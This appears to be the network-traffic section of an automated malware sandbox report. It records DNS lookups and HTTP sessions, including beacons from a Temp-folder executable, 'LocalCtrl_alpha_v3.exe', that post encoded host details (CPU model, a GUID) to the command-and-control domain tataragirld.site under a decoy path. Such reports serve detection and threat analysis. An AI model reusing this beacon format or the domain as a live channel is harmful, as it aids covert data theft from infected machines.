                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.146384001 CET192.168.2.71.1.1.10x2465Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.146531105 CET192.168.2.71.1.1.10x6ac1Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.224621058 CET192.168.2.71.1.1.10x679Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.224797964 CET192.168.2.71.1.1.10x2891Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.415112972 CET192.168.2.71.1.1.10xfdebStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.415838957 CET192.168.2.71.1.1.10xd92bStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 13:18:08.293335915 CET | 1.1.1.1 | 192.168.2.7 | 0xb664 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:18:54.646543026 CET | 1.1.1.1 | 192.168.2.7 | 0xff0e | No error (0) | tataragirld.site | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:54.646543026 CET | 1.1.1.1 | 192.168.2.7 | 0xff0e | No error (0) | tataragirld.site | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:04.059981108 CET | 1.1.1.1 | 192.168.2.7 | 0xe8b6 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:04.060951948 CET | 1.1.1.1 | 192.168.2.7 | 0x5b5b | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:04.550748110 CET | 1.1.1.1 | 192.168.2.7 | 0x784d | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:04.551103115 CET | 1.1.1.1 | 192.168.2.7 | 0x6d05 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:04.551103115 CET | 1.1.1.1 | 192.168.2.7 | 0x6d05 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:05.493421078 CET | 1.1.1.1 | 192.168.2.7 | 0xa3a9 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:05.493906975 CET | 1.1.1.1 | 192.168.2.7 | 0xad8b | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:06.496701002 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d3 | No error (0) | sb.scorecardresearch.com | | 18.244.18.32 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:06.496701002 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d3 | No error (0) | sb.scorecardresearch.com | | 18.244.18.38 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:06.496701002 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d3 | No error (0) | sb.scorecardresearch.com | | 18.244.18.27 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:06.496701002 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d3 | No error (0) | sb.scorecardresearch.com | | 18.244.18.122 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:06.526693106 CET | 1.1.1.1 | 192.168.2.7 | 0x461f | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:06.527096987 CET | 1.1.1.1 | 192.168.2.7 | 0xaac2 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:06.527467012 CET | 1.1.1.1 | 192.168.2.7 | 0xa55f | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:06.528270006 CET | 1.1.1.1 | 192.168.2.7 | 0xe2c7 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:06.555598021 CET | 1.1.1.1 | 192.168.2.7 | 0x490f | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:06.555927038 CET | 1.1.1.1 | 192.168.2.7 | 0x77a3 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:09.152194977 CET | 1.1.1.1 | 192.168.2.7 | 0x6914 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:09.152194977 CET | 1.1.1.1 | 192.168.2.7 | 0x6914 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:09.152590990 CET | 1.1.1.1 | 192.168.2.7 | 0x27db | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Jan 7, 2025 13:19:09.153218031 CET | 1.1.1.1 | 192.168.2.7 | 0x6ac1 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Jan 7, 2025 13:19:09.153625011 CET | 1.1.1.1 | 192.168.2.7 | 0x2465 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:09.153625011 CET | 1.1.1.1 | 192.168.2.7 | 0x2465 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:09.232505083 CET | 1.1.1.1 | 192.168.2.7 | 0x2891 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Jan 7, 2025 13:19:09.232522011 CET | 1.1.1.1 | 192.168.2.7 | 0x679 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:09.232522011 CET | 1.1.1.1 | 192.168.2.7 | 0x679 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:09.421813011 CET | 1.1.1.1 | 192.168.2.7 | 0xfdeb | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:09.421813011 CET | 1.1.1.1 | 192.168.2.7 | 0xfdeb | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.129 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:09.423604965 CET | 1.1.1.1 | 192.168.2.7 | 0xd92b | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
• tataragirld.site
• chrome.cloudflare-dns.com
• clients2.googleusercontent.com
• https:
  • sb.scorecardresearch.com
  • browser.events.data.msn.com
  • c.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49967 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:55 UTC | 391 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Content-Length: 147
Host: tataragirld.site
2025-01-07 12:18:55 UTC | 147 | OUT | Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 8f 02 20 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd $9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-07 12:18:55 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:18:55 GMT
Transfer-Encoding: chunked
Connection: close
ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxI8UgTRXKZ2G47RjokApNBvmTNpJTio6Np2ssabmvQwn0cwad8VWuzPvKdbF0AYWC73%2FzOf01SFCBzZHae6XFLfsrObkUuOaHk9ooptATzA7sWxEp5XIhzaXzX7ClabS6V%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e4a74cdd424a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2179&min_rtt=2170&rtt_var=833&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1174&delivery_rate=1298354&cwnd=252&unsent_bytes=0&cid=6bf5afef8ab54d13&ts=592&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49976 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:56 UTC | 500 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 53
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:18:56 UTC | 53 | OUT | Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 03 02 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii:
2025-01-07 12:18:56 UTC | 746 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:18:56 GMT
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJBVpGoq3KKJgdZL6rVJCDvmHmOSJ%2FQHCanqNTCk%2Bw0%2BbMDl0NemsNOri4yz3Iv13gbms05NNorLW5GkJWhtwfYoEgeWFeMUd4cOAhnbQ6CRuf9aw4EfFtBm9GY5rK4zHZ0h"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e4af1ed88c84-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1833&rtt_var=694&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1189&delivery_rate=1570736&cwnd=176&unsent_bytes=0&cid=bf60582178e42004&ts=314&x=0"
2025-01-07 12:18:56 UTC | 24 | IN | Data Raw: 31 32 0d 0a 02 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 90 0d 0a
Data Ascii: 12
2025-01-07 12:18:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49977 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:57 UTC | 501 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 208
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:18:57 UTC | 208 | OUT | Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 41 ea 24 12 88 00 00 00 08 00 00 00 00 03 03 03 42 e9 27 11 03 03 03 03 03 03 03 03 91 c3 93 61 03 03 03 42 e9 27 11 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e 03 2e 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 53 48 05 04 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 53 48 06 05 03 03 03 03 fc fc fc fc fc fc fc fc fc fc fc fc 03 03 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 78 a6 e5 24 53 87 99 33 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: A$B'aB'SH/..SHSHx$S3
2025-01-07 12:18:57 UTC | 844 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:18:57 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnAF0JlxdHa7TWTg85Xyy4dclgdKO8eKblmr9r5s9%2BHQODk8c0yqbkE%2FVtfmtDu1%2B6jUbY7xnw2dxuN4c8AvtMY8pdyS%2F4BafYvZs8bManhGyEheOPPipm0%2F9Pr0ST9YkXtz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e4b489708cb4-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1953&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1345&delivery_rate=1419543&cwnd=189&unsent_bytes=0&cid=e061af22fb620dac&ts=305&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 50013 | 172.64.41.3 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:09 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
2025-01-07 12:19:09 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e50179224213-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 50014 | 172.64.41.3 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:09 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
2025-01-07 12:19:09 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e50198f38c1b-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 50015 | 162.159.61.3 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:09 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
2025-01-07 12:19:09 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5021fc778d0-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 50016 | 142.250.185.129 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:10 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-07 12:19:10 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                X-GUploader-UploadID: AFiumC7rClyv0uz6BrFUmf-ryDJI3ZRKl1kGz2pVkOiQg2vAV76vun2MdAynDRNovH8g-GGQGjK7DYQ
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                Content-Length: 154477
                                                                                                                                                                                                                                                                                                X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                                                                                Date: Mon, 06 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                                Expires: Tue, 06 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                Age: 73257
                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 50025 | 172.64.41.3 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:10 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
2025-01-07 12:19:11 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Tue, 07 Jan 2025 12:19:10 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fe3e509b96843b0-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:11 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d 05 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 21 00 29 0f 70 72 6f 64 2d 61 67 69 63 2d 65 75 32 2d 33 07 65 61 73 74 75 73 32 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 83 00 06 00 01 00 00 00 35 00 30 06 6e 73 31 2d 30 36 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 f1 00 0c 00 ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: data-edgesmartscreenmicrosoftcomA&prod-atm-wds-edgetrafficmanagernetA!)prod-agic-eu2-3eastus2cloudappazure,50ns1-06azure-dns,msnhst"',:<)


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                8192.168.2.75000318.244.18.324432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC925OUTGET /b?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
